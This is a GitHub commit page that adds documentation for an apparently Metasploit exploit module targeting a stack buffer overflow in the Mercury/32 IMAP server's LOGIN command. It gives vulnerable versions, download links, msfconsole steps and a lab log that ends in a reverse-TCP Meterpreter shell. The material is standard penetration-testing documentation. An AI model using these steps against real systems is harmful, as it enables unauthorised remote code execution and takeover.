-
Notifications
You must be signed in to change notification settings - Fork 13.7k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Land #10853, Add universal targeting to Mercury/32 IMAP LOGIN exploit
- Loading branch information
1 parent
e843da9
commit d6c4f5e
Showing
2 changed files
with
83 additions
and
39 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,48 @@ | ||
Mercury/32 <= 4.01b contains an stack based buffer overflow in IMAPD LOGIN verb. Sending an specially crafted IMAP login command allows remote code execution. | ||
|
||
## Vulnerable Application | ||
|
||
This module exploits a stack buffer overflow in Mercury/32 <= 4.01b IMAPD LOGIN verb. By sending a specially crafted login command, a buffer is corrupted, and code execution is possible. This vulnerability was discovered by (mu-b at digit-labs.org). | ||
|
||
* [Mercury/32 v4.01a](https://www.exploit-db.com/apps/8e0bf8aec964af66a5d440ef705d548f-m32-401a.exe) | ||
* [Mercury/32 v4.01b upgrade](http://web.archive.org/web/20070119125847if_/http://ftp.usm.maine.edu/pegasus/Mercury32/m32-401b.zip) | ||
|
||
This module has been tested successfully on: | ||
|
||
* Mercury/32 v4.01a on Windows XP SP3 (x86) | ||
* Mercury/32 v4.01a on Windows 7 SP1 (x86) | ||
* Mercury/32 v4.01a on Windows Server 2003 Standard Edition SP1 (x86) | ||
* Mercury/32 v4.01b on Windows 7 SP1 (x86) | ||
|
||
## Verification steps | ||
|
||
1. Install the vulnerable Mercury/32 application | ||
2. Start msfconsole | ||
3. Do: `use exploit/windows/imap/mercury_login` | ||
4. Do: `set RHOST IP` | ||
5. Do: `exploit` | ||
6. You should get a shell. | ||
|
||
## Scenarios | ||
|
||
### Mercury/32 v4.01a on Windows 7 SP1 x86 | ||
``` | ||
msf > use exploit/windows/imap/mercury_login1 | ||
msf exploit(windows/imap/mercury_login1) > set rhost 192.168.46.144 | ||
rhost => 192.168.46.144 | ||
msf exploit(windows/imap/mercury_login1) > exploit | ||
[*] Started reverse TCP handler on 192.168.46.1:4444 | ||
[*] 192.168.46.144:143 - Sending payload (8931 bytes) ... | ||
[*] Sending stage (179779 bytes) to 192.168.46.144 | ||
[*] Meterpreter session 1 opened (192.168.46.1:4444 -> 192.168.46.144:49219) at 2018-10-27 20:43:14 +0200 | ||
meterpreter > | ||
Computer : WIN-DQ8ELRSOJAO | ||
OS : Windows 7 (Build 7601, Service Pack 1). | ||
Architecture : x86 | ||
System Language : en_US | ||
Domain : WORKGROUP | ||
Logged On Users : 2 | ||
Meterpreter : x86/windows | ||
``` |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters